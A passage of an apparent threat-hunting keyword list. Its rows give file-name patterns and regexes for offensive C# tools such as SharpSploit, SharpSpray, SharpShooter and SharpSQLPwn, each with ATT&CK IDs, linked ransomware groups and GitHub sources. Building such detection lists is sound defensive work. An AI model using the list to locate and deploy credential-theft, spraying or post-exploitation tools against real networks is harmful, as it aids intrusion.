fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18671" "*\SharpShares.exe*",".{0,1000}\\SharpShares\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18672" "*\SharpShares.exe*",".{0,1000}\\SharpShares\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18673" "*\SharpShares.exe*",".{0,1000}\\SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18674" "*\SharpShares\*",".{0,1000}\\SharpShares\\.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","18675" "*\SharpShares-master*",".{0,1000}\\SharpShares\-master.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","18676" "*\SharpShooter.*",".{0,1000}\\SharpShooter\..{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18677" "*\sharpshooter.js*",".{0,1000}\\sharpshooter\.js.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource 
Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18678" "*\sharpshooter.vba",".{0,1000}\\sharpshooter\.vba","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18679" "*\sharpshooter.vbs",".{0,1000}\\sharpshooter\.vbs","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18680" "*\SharpShooter-main*",".{0,1000}\\SharpShooter\-main.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18681" "*\sharpshooterv4.js*",".{0,1000}\\sharpshooterv4\.js.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18682" "*\sharpshooterv4.vba",".{0,1000}\\sharpshooterv4\.vba","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18683" "*\sharpshooterv4.vbs",".{0,1000}\\sharpshooterv4\.vbs","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - 
T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18684" "*\Sharp-SMBExec.exe*",".{0,1000}\\Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18685" "*\Sharp-SMBExec.exe*",".{0,1000}\\Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT29 - APT20 - PowerPool","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18686" "*\SharpSniper.exe*",".{0,1000}\\SharpSniper\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18687" 
"*\SharpSniper.exe*",".{0,1000}\\SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18688" "*\SharpSocksServerCore.dll*",".{0,1000}\\SharpSocksServerCore\.dll.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","18689" "*\SharpSphere.exe*",".{0,1000}\\SharpSphere\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18690" "*\SharpSphere.exe*",".{0,1000}\\SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18691" "*\SharpSploit.csproj*",".{0,1000}\\SharpSploit\.csproj.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","18692" "*\SharpSploit.dll*",".{0,1000}\\SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18693" "*\SharpSploit.dll*",".{0,1000}\\SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 
- T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","18694" "*\SharpSploit.xml*",".{0,1000}\\SharpSploit\.xml.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","18695" "*\SharpSploitConsole.*",".{0,1000}\\SharpSploitConsole\..{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","18696" "*\SharpSploit-master*",".{0,1000}\\SharpSploit\-master.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","18697" 
"*\SharpSpray.csproj*",".{0,1000}\\SharpSpray\.csproj.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18698" "*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18699" "*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18700" "*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18701" "*\SharpSpray.exe*",".{0,1000}\\SharpSpray\.exe.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","18702" "*\sharpspray.exe*",".{0,1000}\\sharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18703" "*\SharpSpray.sln*",".{0,1000}\\SharpSpray\.sln.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18704" "*\SharpSpray\*",".{0,1000}\\SharpSpray\\.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18705" "*\SharpSpray-1.1.zip*",".{0,1000}\\SharpSpray\-1\.1\.zip.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","18706" "*\SharpSpray1.exe*",".{0,1000}\\SharpSpray1\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18707" "*\SharpSQL.exe*",".{0,1000}\\SharpSQL\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18708" "*\SharpSql.exe*",".{0,1000}\\SharpSql\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities 
like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18709" "*\SharpSQL.exe*",".{0,1000}\\SharpSQL\.exe.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18710" "*\SharpSQL.pdb*",".{0,1000}\\SharpSQL\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18711" "*\SharpSQL.pdb*",".{0,1000}\\SharpSQL\.pdb.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - 
TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18712" "*\SharpSQLDump.exe*",".{0,1000}\\SharpSQLDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18713" "*\SharpSQLPwn.exe*",".{0,1000}\\SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18714" "*\SharpSQLPwn.exe*",".{0,1000}\\SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18715" "*\SharpSQLTools.exe*",".{0,1000}\\SharpSQLTools\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18716" "*\SharpSSDP.csproj*",".{0,1000}\\SharpSSDP\.csproj.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","18717" "*\SharpSSDP.sln*",".{0,1000}\\SharpSSDP\.sln.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related 
services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","18718" "*\SharpSSDP\*",".{0,1000}\\SharpSSDP\\.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","18719" "*\SharpStay.exe*",".{0,1000}\\SharpStay\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18720" "*\SharpStay.exe*",".{0,1000}\\SharpStay\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18721" "*\SharpStay.exe*",".{0,1000}\\SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18722" "*\SharpSvc.exe*",".{0,1000}\\SharpSvc\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - 